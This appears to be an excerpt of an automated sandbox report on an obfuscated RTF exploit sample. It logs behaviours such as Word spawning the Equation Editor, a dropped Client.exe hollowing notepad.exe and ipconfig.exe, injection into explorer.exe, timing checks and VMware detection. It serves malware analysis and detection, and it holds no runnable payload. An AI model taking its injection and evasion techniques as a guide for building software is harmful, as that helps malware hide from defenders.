Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_02406671 push 00000003h; ret	6_2_0240668E
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_02404672 push 00000003h; ret	6_2_0240467C
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_0240261D push 00000003h; ret	6_2_02402627
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_02406220 push 00000003h; ret	6_2_0240623C
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_02400A22 push 00000003h; ret	6_2_02400A25
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_02403E22 push 00000003h; ret	6_2_02403E25
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_02406A32 push 00000003h; ret	6_2_02406A36
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_02403633 push 00000003h; ret	6_2_02403636
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_02405E3B push 00000003h; ret	6_2_02405E3E
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_024032E4 push 00000003h; ret	6_2_024032E7
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 6_2_02405AEF push 00000003h; ret	6_2_02405B20

Source: Client.exe.0.dr	Static PE information: section name: 5++.8$
Source: Client.exe.0.dr	Static PE information: section name:

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\notepad.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\notepad.exe	RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: 0000000000089904 second address: 000000000008990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: 0000000000089B7E second address: 0000000000089B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Windows Analysis Report SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.19912

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.19912

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 772	Thread sleep time: -240000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe TID: 2524	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe	Last function: Thread delayed

Source: explorer.exe, 0000000A.00000000.1032772942.00000000043F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 0000000A.00000000.996254060.0000000008636000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 0000000A.00000000.996254060.0000000008636000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000d-dv
Source: explorer.exe, 0000000A.00000000.1006904830.000000000434F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
Source: explorer.exe, 0000000A.00000000.1027538105.000000000037B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
Source: explorer.exe, 0000000A.00000000.1007549733.0000000004423000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.1032772942.00000000043F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
Source: explorer.exe, 0000000A.00000000.1006904830.000000000434F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0Q
Source: explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\SysWOW64\notepad.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe	Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe	Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section unmapped: C:\Windows\SysWOW64\notepad.exe base address: 400000			Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe	Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 370000			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Client.exe	Memory written: C:\Windows\SysWOW64\notepad.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Memory written: C:\Windows\SysWOW64\notepad.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Memory written: C:\Windows\SysWOW64\notepad.exe base: 7EFDE008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Memory written: C:\Windows\SysWOW64\notepad.exe base: 80000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Memory written: C:\Windows\SysWOW64\notepad.exe base: 77A7975D	Jump to behavior

Source: C:\Windows\SysWOW64\notepad.exe	Thread register set: target process: 1860	Jump to behavior
Source: C:\Windows\SysWOW64\notepad.exe	Thread register set: target process: 1860	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Thread register set: target process: 1860	Jump to behavior

Source: explorer.exe, 0000000A.00000000.956257017.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1002025010.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027938385.0000000000830000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.956257017.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1002025010.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.956257017.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1002025010.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027938385.0000000000830000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager<